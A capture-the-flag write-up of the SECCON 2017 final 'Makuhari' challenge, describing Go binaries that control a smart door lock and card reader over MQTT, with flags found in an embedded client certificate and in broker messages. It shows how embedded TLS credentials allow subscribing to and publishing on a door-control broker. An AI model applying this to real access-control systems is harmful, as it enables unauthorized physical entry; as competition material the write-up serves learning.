This write-up describe Makuhari (幕張) challenge given at SECCON 2017 final competition for domestic teams.
The following 2 binaries were provided.
- dooriccreaderapp_v1
- 5ba48b4bb315b33250b812fb0deefdda5aac19d2db07d9bf26239215d4c51dfc
- ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped
- doorlockctlapp_v1
- e65bf81d3c6ccc32407c7f9d63f3db8dd52307bb8decc39070cf8d0dd1240204
- ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped
Both binaries written in Golang attempt to connect MQTT broker to control smart door & IC card reader.
# ./doorlockctlapp_v1 --help
Usage of ./doorlockctlapp_v1:
-h string
MQTT broker address (default "makuhari.seccon")
-p string
MQTT broker port (default "1883")
# ./dooriccreaderapp_v1 --help
Usage of ./dooriccreaderapp_v1:
-h string
MQTT broker address (default "makuhari.koth.seccon")
-i string
idm hex representation without hex prefix (default "000000000000")
-p string
MQTT broker port (default "8883")
In the competition, makuhari.seccon didn't exist but makuhari.koth.seccon at 10.0.13.1 can be connected by MQTT with TLS.
Both executables contains TLS certificates/key files for connectiong MQTT broker. The first flag located in the client certificate as below.
$ openssl x509 -in client.crt -text
Certificate:
Data:
Version: 1 (0x0)
Serial Number: 12132904043160716613 (0xa860bbf1c27ec545)
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=JP, ST=Tokyo, L=Senjyu, O=SECCON, CN=secconfinaltrust
Validity
Not Before: Feb 17 00:08:17 2018 GMT
Not After : Feb 17 00:08:17 2019 GMT
Subject: C=JP, ST=Tokyo, L=Makuhari, O=Eag1eJum7, CN=debug.makuhari/emailAddress=SECCON{CLIENT_CERT_IS_C0MM0N_BY_DELIVERY_REAS0N}
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
The flag was published by MQTT broker (makuhari.koth.seccon) periodically. We could see the flag by subscribing topic "mkhr/v/1/access/controller" (See makuhari_subscribe.py).
mkhr/v/1/access/controller: {"idm": "0114514810191900", "device-uuid": "1565a6cc-718a-4b35-ab5c-272b3ceadd17"}
mkhr/v/1/access/controller: {"idm":"000000000000","device-uuid":"80b5d612-4b5a-4f7a-986d-99532e206c7c","dt":1518848233}
mkhr/v/1/access/controller: {"warn": "DoorCtl firmware update is broken. DoorCtl firmware update is scheduled at 2018/02/17 15:00(JST)."}
mkhr/v/1/access/controller: {"second_flag": "SECCON\\{MQTT_1N_THE_W1LD\\}"}
mkhr/v/1/access/controller: {"idm": "0146581920292901", "device-uuid": "80b5d612-4b5a-4f7a-986d-99532e206c7c"}
After updating DoorCtl firmware (announced in MQTT message as above), we could see the following message:
mkhr/v/1/access/controller: {"warn": "Submit your flag(json). \ttopic: mkhr/v/1/access/controller, 'devise-uuid':'door devise of outgoing no one else', 'idm':'closed person', 'flag':'your flag' "}
We got defence points by submitting our defence keyword (See makuhari_publish.py).